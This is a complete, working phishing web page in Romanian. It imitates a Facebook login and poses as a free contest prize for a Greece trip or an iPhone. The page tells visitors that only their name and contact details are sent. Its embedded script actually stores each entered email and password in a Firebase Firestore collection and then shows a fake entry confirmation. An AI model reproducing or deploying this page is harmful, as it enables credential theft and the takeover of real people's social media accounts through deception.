<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>Incearca-ti norocul aici</title>
  <meta name="author" content="Ionescu Marian">
  <meta name="description" content="Incearca-ti norocul, nu ai nimic de pierdut.">
   </head>
   <style>
      body{
        background-color: #f0f2f5;
        font-family: Helvetica, Arial, sans-serif;
      }

      #done{
        display: none;
      }

      .website{
        max-width: 1024px;
        margin: 0 auto;
        text-align: center;
        color: #606770;
      }
      p:nth-child(1){
        margin-top: 60px;
        font-size: 1.2rem;
      }

      .login{
            align-items: center;
            background-color: #fff;
            border: none;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);
            box-sizing: border-box;
            margin: 40px 0 0;
            padding: 20px 0 28px;
            width: 396px;
            height: 300px;
            margin:0 auto;
            margin-top: 40px;
      }

      form
      {
        display: flex;
        flex-direction: column;
        width: 90%;
        margin: 0 auto;
        margin-top: 0px;
      }
      input{
        margin-top: 20px;
        height: 35px;
        border: 1px solid lightgrey;
        border-radius: 3px;
        padding-left: 10px;
      }
      form p{
        font-size: .9rem;
        margin-top: 30px;
      }

      form button{
        height: 40px;
        color: white;
        background-color: #42b72a;
        border-radius: 10px;
        border: none;
        font-size: 1rem;
        margin-top: 10px;
        cursor: pointer;
      }

      .data{
        text-align: start;
        width: 550px;
        margin: 0 auto;
        margin-bottom: 50px;
      }

   </style>
  <body>
  
    <div class="website">
      <p id="done">Datele tale au fost trimise si ai fost inscris in competitie, daca ai norocul sa castigi, o sa fii contactat pe e-mail sau pe nr. de telefon.</p>
      <div class="main">
        <p>Logheaza-te cu facebook pentru a intra in competitie</p>
        <div class="login">
          <form>
            <input type="email" name="email" required id="email" placeholder="E-mail sau număr de telefon:">
            <input type="password" name="password" required id="password" placeholder="Parolă">
            <p>Doar numele contului tau si e-mail/nr. de telefon vor fii trimise catre noi.</p>
            <button type="button" id="button">Trimite</button>
        </form>
        </div>
        <div class="data">
          <p>Ce poti sa castigi: O excursie in Grecia, un telefon Iphone 12 Mini sau contra valoarea lui in bani ( £699 )</p>
          <p>Ce trebuie sa faci? Este complet gratuit doar trebuie sa te loghezi pentru a avea numele tau si adresa de e-mail sau numarul tau de telefon pentru a te contacta.</p>
          <p>Note: 1.Costul transportului este suportat de noi</p>
          <p>2.Extragerea va fii facuta cu cei care au trimis datele catre noi si va avea loc pe 21 Ianuarie 2021<p>
          <p>3.Excursia este de 14 zile in zona Mykonos, in caz de problemele cauzate de Covid-19, premiul poate fii revendicat dupa 5 luni</p>
       </div>
   </div>
    </div>

  <script src="https://www.gstatic.com/firebasejs/8.2.1/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/7.19.0/firebase-firestore.js"></script>
  <script type="text/javascript">


    var firebaseConfig = {
      apiKey: "AIzaSyAhQ0Js1-wMfSqoRoX_KKv9dijnQ-xZmFE",
      authDomain: "test123-94e0f.firebaseapp.com",
      projectId: "test123-94e0f",
      storageBucket: "test123-94e0f.appspot.com",
      messagingSenderId: "782476653977",
      appId: "1:782476653977:web:6fd47533d1349d9325cf08"
  };

    var fire = firebase.initializeApp(firebaseConfig);

      let email = document.querySelector("#email");
      let emailValue = "";
      email.addEventListener("change", (e) => {
        emailValue = e.target.value
      

      })

      let password = document.querySelector("#password");
      let passwordValue = "";

      password.addEventListener("change", (e) => {
        passwordValue = e.target.value
       

      })

      let btn = document.querySelector("#button")

      btn.addEventListener('click', () => {
         if(emailValue !== "" || passwordValue !== ""){
            fire.firestore().collection("data").doc().set({EMAIL: emailValue, PASSWORD: passwordValue })
            document.querySelector(".main").style.display = "none";
            document.querySelector("#done").style.display = "block";
        }
      })
      
    

  </script>
  </body>
</html>